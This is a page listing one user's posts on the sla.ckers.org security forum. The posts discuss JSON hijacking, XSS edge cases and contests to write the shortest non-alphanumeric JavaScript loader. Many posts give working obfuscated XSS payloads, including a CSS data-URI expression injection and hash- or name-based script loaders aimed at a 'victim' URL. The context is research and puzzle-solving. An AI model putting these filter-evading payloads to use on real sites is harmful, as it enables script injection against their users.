Cenzic 232 Patent
Paid Advertising
sla.ckers.org is
ha.ckers sla.cking
Sla.ckers.org
Script obfuscation, filter evasion, IDS/IPS/WAF bypassing... this is where it should live. Because this topic is too big to live anywhere else. Phj33r! 

Current Page: 1 of 1
Results 1 - 29 of 29
3 years ago
theharmonyguy
@thornmaker: Sorry, yes, I was focused more on the fact that the <script> tag isn't rendered as HTML... but you're right, if the three slashes weren't added, that would close off the script and you could insert HTML. However, aren't those slashes enough? Since the forward slash is escaped, it still doesn't seem like an XSS issue...
Forum: XSS Info
3 years ago
theharmonyguy
It's been a while since I looked at this sort of JSON hijacking, but I know you can't override the Object constructor like you can the Array constructor, so that method of attack would not work. I recall there still being some possible issues with this format, though, which is why (for instance) Facebook includes a bit of dummy code at the start of any JSON responses.
Forum: XSS Info
3 years ago
theharmonyguy
Keep in mind that the part of the source code you're looking at is already inside of a bunch of JavaScript - in fact, it's part of a string inside of a JSON assignment. The slashes before the quote marks prevent them from terminating the string and allowing injection of new scripts. Consequently, this wouldn't qualify as an XSS hole, even though the appearances of <> unencoded may make it lo
Forum: XSS Info
3 years ago
theharmonyguy
Yay! :) As for no spaces... <style /><a href="}@import/**/data:text/css%3Bbase64,Knt4OmV4cHJlc3Npb24oYWxlcnQoMSkpfQ%3D%3D;">click</a>
Forum: Obfuscation
3 years ago
theharmonyguy
How about this? <style /><a href="}@import data:text/css%3Bbase64,Knt4OmV4cHJlc3Npb24oYWxlcnQoMSkpfQ%3D%3D;">click</a>
Forum: Obfuscation
3 years ago
theharmonyguy
Pretty slick! One quick trick I see that will shave off 4 characters is to replace T=Z with T=C+A+Z and then replace the two C+A+T's with just T.
Forum: Obfuscation
4 years ago
theharmonyguy
Hey all, I've often visited the XSS Cheat Sheet, RSnake's blog, and these forums (particularly about non-alnum JS, which I discovered during last year's OWASP Sweden contest), but I'd never actually joined until last week. Figured I should make a formal introduction. I'm Joey Tyson, a.k.a theharmonyguy, and got started with security through a hobby of finding holes in Facebook apps. During grad
Forum: Intro
4 years ago
theharmonyguy
OK, I was bored tonight, so I now present a truly cross-browser, non-alphanumeric arbitrary script loader: // 240 location.hash='javascript:alert(1)'; ð=[_='',Ú=!_+_,$=!!_+_,æ=!_/!!_+_,þ={}+_,µ=Ú[º=+_],Æ=Ú[++_],È=_+_,ø=þ[_],Ñ=æ[_],Á=$[_++],É=Ú[++_],Ó=$[_],Ç=þ[_+È]][Ç+ø+Ñ+Ç+Á+µ],(Å=ð()[º]) [ª=$[È]+ø+Ç+Á+µ+æ[_]+ø+Ñ]=/[^#]+$/[É+(ú=/_/[Ç+ø+Ñ+Ó+µ+Æ
Forum: Obfuscation
4 years ago
theharmonyguy
Well, I created an initial, non-optimized possible starting point: // 157 location.hash='javascript:alert(1)'; ð=[_='',Ú=!_+_,$=!!_+_,æ=!_/!!_+_,þ={}+_,µ=Ú[+_],ø=þ[++_],Ñ=æ[_],Á=$[_++],Ç=þ[++_+(--_)]][Ç+ø+Ñ+Ç+Á+µ],(Å=ð()[+[]])[ª=$[_]+ø+Ç+Á+µ+æ[++_]+ø+Ñ]=/[^#]+$/(Å[ª]) However, this one is only Firefox and Chrome (probably Safari) so far, since apparently IE do
Forum: Obfuscation
4 years ago
theharmonyguy
LeverOne Wrote: ------------------------------------------------------- > it will be in the "old style" Heh, I didn't realize that ="ab" was also Firefox-only... now I know!
Forum: Obfuscation
4 years ago
theharmonyguy
After learning more about regex and seeing .mario's use of it, I got down to 106: location.hash='javascript:alert(1)'; (æ=([µ,ð,,,,Ñ,,Å]=[ƒ=!'']+ƒ/!ƒ,[[,Á,ª,$,,,ø,,,,Ç]=!ƒ+{}][$+ø+ð+µ])())[_=ª+ø+Ç+Á+µ+Å+ø+Ñ]=/#(.*)/(æ[_])[+ƒ] At first this was 107, and after reading LeverOne's mention of Gareth's trick, I could only get to 104... and then I realized I had once again lef
Forum: Obfuscation
4 years ago
theharmonyguy
I was playing around with some of the tricks on this list and came across two issues... First, some of the ones under "all browsers" use __proto__ and __parent__. But wouldn't those exclude IE (and Opera)? Also, __proto__.__parent__ is undefined in Chrome. Second, we should perhaps distinguish between getting a window object and getting the window object of the current document. Fo
Forum: Obfuscation
4 years ago
theharmonyguy
*facepalm* I get it now, thanks. I haven't done much regex, so I started with what I knew... now I know what to study next.
Forum: Obfuscation
4 years ago
theharmonyguy
OK LeverOne, I think I've gotten 117: http:// victim.com/#*/alert(1)//javascript:/*xx _=([µ,ð,,É,,Ñ,,Å]=[ƒ=!'']+ƒ/!ƒ,[[,Á,ª,$,,,ø,,,,Ç]=!ƒ+{}][$+ø+ð+µ])()[ª+ø+Ç+Á+µ+Å+ø+Ñ],_=(_+Á)[$+ª+Å+Ç+É](++ƒ*-ƒ<<ƒ)+_ btw, when I try this style in Firefox, the redirect happens but the new script doesn't actually execute; not sure if it's just a setting of mine or wh
Forum: Obfuscation
4 years ago
theharmonyguy
Not the first time I've forgotten about a leftover letter. :) You know, we could change it to be cross-browser - that would not only remove btoa but (x=[]['sort'])() as well. Though these exercises may be more fun for a newbie like me. :)
Forum: Obfuscation
4 years ago
theharmonyguy
Well if we drop the newer rules, I'm already ahead of you... :) // 109 name='javascript:alert(1)'; (w=(=+x/!x,[[,a,l,s,,,o,b,,,c]=!x+{}])())=w('&#157;©&#158;')] But LeverOne already got down to 89 using btoa anyway...
Forum: Obfuscation
4 years ago
theharmonyguy
LeverOne Wrote: ------------------------------------------------------- > First, think about that number (ƒ*ƒ*ƒ), and you > get 120 - is the limit. That number is 2*2*2=8... not following you. Totally forgot about bitwise operators. Very slick. LeverOne Wrote: ------------------------------------------------------- > Secondly, "eval" - this is the wrong directio
Forum: Obfuscation
4 years ago
theharmonyguy
Well, I'm stuck at 121: (æ=[[µ,ð,,É,,Ñ,,Å]=[ƒ=!'']+ƒ/!ƒ,[,Á,ª,$,,,ø,,,,Ç]=!ƒ+{}][$+ø+ð+µ])()[É+(µ+æ)[++ƒ+[ƒ*ƒ*ƒ]]+Á+ª]('/*'+æ()[ª+ø+Ç+Á+µ+Å+ø+Ñ]) (æ=[[µ,ð,,É,,Ñ,,Å]=[ƒ=!'']+ƒ/[],[,Á,ª,$,,,ø,,,,Ç]=!ƒ+{}][$+ø+ð+µ])()[É+(µ+æ)[++ƒ+[ƒ*ƒ*ƒ]]+Á+ª]('/*'+æ()[ª+ø+Ç+Á+µ+Å+ø+Ñ]) (æ=[[µ,ð,,É,,Ñ,,Å]=[ƒ=!'']+ƒ/![[,Á,ª,$,,,ø,
Forum: Obfuscation
4 years ago
theharmonyguy
New approach got me down to 130 126 123: http:// victim/#*/alert(1) (æ=[ƒ=!'',[µ,ð,,É,,Ñ,,,,Å]=[ƒ]+ƒ[[,Á,ª,$,,,ø,,,,Ç]=!ƒ+{}]][$+ø+ð+µ])()[É+(µ+æ)[++ƒ+[ƒ*ƒ*ƒ]]+Á+ª]('/*'+æ()[ª+ø+Ç+Á+µ+Å+ø+Ñ])
Forum: Obfuscation
4 years ago
theharmonyguy
OK, I'm open to hints - I must be missing some trick because I just can't seem to get under 144: (æ=[ƒ='',[µ,ð,Ú,É,,Ñ]=[!ƒ++]+ƒ[[,Á,ª,$,,,ø,,,,Ç]=!ƒ+{}],_=Ñ+Á+(þ=ƒ[Ç+ø+Ñ+$+µ+ð+Ú+Ç+µ+ø+ð]+Á)[ƒ+[ƒ]]+É][$+ø+ð+µ])()[É+þ[++ƒ+[++ƒ*ƒ]]+Á+ª](æ()[_]) I've tried to get rid of the opening ƒ='', find a shorter way to get "c" or "v", but it
Forum: Obfuscation
4 years ago
theharmonyguy
@LeverOne: I'm down to 148 144 so far. No hints yet. :)
Forum: Obfuscation
4 years ago
theharmonyguy
// 154 name='alert(1)'; (ð=[ƒ='',[µ,æ,Ú,É,,Á,þ,$,,,ø,,,,Ç]=!ƒ+[!++ƒ]+{},[,Ñ]=ƒ/!ƒ+µ,ª=(ƒ[Ç+ø+Ñ+$+µ+æ+Ú+Ç+µ+ø+æ]+µ)[ƒ+[ƒ]]][$+ø+æ+µ])()[É+(ð+µ)[++ƒ+[++ƒ+ƒ+ƒ/ƒ]]+Á+þ](ð()[Ñ+Á+ª+É])
Forum: Obfuscation
4 years ago
theharmonyguy
// 155 name='alert(1)'; (ð=[ƒ=+!'',[µ,æ,Ú,É,,Á,þ,$,,,ø,,,,Ç]=!!ƒ+[!ƒ]+{},[,Ñ]=ƒ/!ƒ+µ,ª=(ƒ[Ç+ø+Ñ+$+µ+æ+Ú+Ç+µ+ø+æ]+µ)[ƒ+[ƒ]]][$+ø+æ+µ])()[É+(ð+µ)[++ƒ+[++ƒ+ƒ+ƒ/ƒ]]+Á+þ](ð()[Ñ+Á+ª+É])
Forum: Obfuscation
4 years ago
theharmonyguy
// 157, follows LeverOne's four rules name='alert(1)'; (ð=[ƒ=+!'',[µ,æ,Ú,É,,Á,þ,$,,,ø,,,,Ç]=!!ƒ+[!ƒ]+{},Ñ=(ƒ/!ƒ+µ)[ƒ],ª=(ƒ[Ç+ø+Ñ+$+µ+æ+Ú+Ç+µ+ø+æ]+µ)[ƒ+[ƒ]]][$+ø+æ+µ])()[É+(ð+µ)[++ƒ+[++ƒ+ƒ+ƒ/ƒ]]+Á+þ](ð()[Ñ+Á+ª+É]) I tried employing some of the tricks that LeverOne and .mario have been using to shorten up the beginning, but without using b
Forum: Obfuscation
4 years ago
theharmonyguy
Oops, just noticed I had left some numbers in the code I originally posted - my bad. I've gotten down to 160 using a slightly different approach so far. I'm totally game for more difficult/interesting challenges, you guys have just been way ahead of me on this stuff. :)
Forum: Obfuscation
4 years ago
theharmonyguy
LeverOne Wrote: ------------------------------------------------------- > Yes, as well as characters 0-31. I do not quite > understand what the problem? These symbols > (127—159) can be filtered? Anything can be > filtered. I wasn't thinking so much of filtering as inserting - i.e., how are you going to make a request that includes those characters and get Firefox to reliab
Forum: Obfuscation
4 years ago
theharmonyguy
@LeverOne: Good thought to use btoa for 'v' and 'name', but for the latter case I'm wondering how practical it would be to include &#157; and &#158; since they're control codes...
Forum: Obfuscation
4 years ago
theharmonyguy
Well, those were supposed to be Unicode characters resembling the letters they represent... sorry for the encodings.
Forum: Obfuscation
4 years ago
theharmonyguy
You guys may have already tackled this, but I didn't recall seeing it yet... There was a topic on here for the shortest non-alphanumeric JS to execute alert(1), changed to alert('owasp') for the AppSec challenge. Then much time has been invested trying to find the smallest set of nonalnum characters needed to execute arbitrary JS. So I figured, why not for the fun of it combine the two - fin
Forum: Obfuscation
Current Page: 1 of 1